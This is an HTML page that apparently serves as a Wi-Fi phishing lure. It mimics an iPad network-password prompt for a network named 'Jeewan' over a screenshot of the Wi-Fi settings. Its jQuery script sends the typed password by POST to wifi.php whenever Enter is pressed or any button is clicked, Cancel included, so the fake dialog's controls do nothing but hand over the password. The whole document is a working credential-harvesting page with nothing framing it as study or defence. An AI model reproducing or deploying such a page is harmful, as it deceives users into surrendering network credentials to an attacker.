<html>
<head>
	<title>wifi password</title>
	<style>
	body {
		margin: 0;
		top: 0;
		left: 0;
		width: 100%;
		height: 100%;
		background: 100%;
		overflow: hidden;
		font-size: 18px;
		font-family: "Helvetica";
font-weight: bold;
	}
	.wrapper {
		position: relative;
		margin: auto;
		display: block;
		background: #E0E3E8;
		text-align: center;
	}
	.bgImg {
		position: relative;
		display: block;
		margin: auto;
		width: 100%;
		
	}
	.pHolder{
		position: absolute;
		width: 100%;
		background: rgba(0,0,0,0.7);
		z-index: 5;
	}
	.askPass {
		position: relative;
		margin: 3% auto;
		
		height:1500px;
		width: 80%;
		background: #F2EFF6;
	}
	.topL {
		position: relative;
		width: 99.5%;
		
		background: #eeeeee; /* Old browsers */
		background: -moz-linear-gradient(top, #eeeeee 50%, #cccccc 100%); /* FF3.6+ */
		background: -webkit-gradient(linear, left top, left bottom, color-stop(50%,#eeeeee), color-stop(100%,#cccccc)); /* Chrome,Safari4+ */
		background: -webkit-linear-gradient(top, #eeeeee 50%,#cccccc 100%); /* Chrome10+,Safari5.1+ */
		background: -o-linear-gradient(top, #eeeeee 50%,#cccccc 100%); /* Opera 11.10+ */
		background: -ms-linear-gradient(top, #eeeeee 50%,#cccccc 100%); /* IE10+ */
		background: linear-gradient(to bottom, #eeeeee 50%,#cccccc 100%); /* W3C */
		filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#eeeeee', endColorstr='#cccccc',GradientType=0 ); /* IE6-9 */
	}
	.options {
		padding: 5px;
	}
	.ask {
		font-size: 0.8em;
		display: block;
		padding: 10px;
	}
	.cancel {
		display: inline-block;
		width: 32%;
		text-align: left;
		font-size: 1em;
		color: #78A2B0;
		cursor: pointer;
	}
	.enter {
		display: inline-block;	
		width: 32%;
		text-align: center;
		font-size: 1em;
		cursor: pointer;
	}
	.join {
		display: inline-block;
		width: 32%;
		text-align: right;
		font-size: 1em;
		cursor: pointer;
		color: #aaa4b2;
	}

	input {
		margin : 6% auto;
		border: #fff;
		background: #fff;
		outline: #fff;
		width: 90%;
		-moz-border-radius:6px; /* Firefox */
		-webkit-border-radius: 6px; /* Safari, Chrome */
		-khtml-border-radius: 6px; /* KHTML */
		border-radius: 6px; /* CSS3 */
		/*height: 2em;*/
		font-size: 1.5em;
		padding: 2px 5px;
	}

	</style>
</head>
<body>
<div class="wrapper">
	<div class="pHolder">
		<div class="askPass">
			<div class="topL">
				<span class="ask">Enter the password for "Jeewan"</span>
				<div class="options">
					<span class="cancel">Cancel</span>
					<span class="enter">Enter Password</span>
					<span class="join">Join</span>
				</div>

				
			</div>
			<form name="send"  method="POST">
				<input type="password" id="password" name="password" placeholder="Password">
			</form>

		</div>
	</div>
	<img src="ipad-wifi-networks.jpg" alt="" class="bgImg">

</div>
<script src="jquery-1.10.2.js"></script>
<script>

$('#password').keyup(function(e) {
	//alert(e.keyCode);
	if(e.keyCode == 13) {
		alert("ok");
   $('form[name=send]').attr('action','wifi.php');
  $('form[name=send]').submit();
  e.preventDefault();
	}
});
$('.cancel, .enter, .join').click(function(){
	alert("ok");
  $('form[name=send]').attr('action','wifi.php');
  $('form[name=send]').submit();
});
</script>

</body>
</html>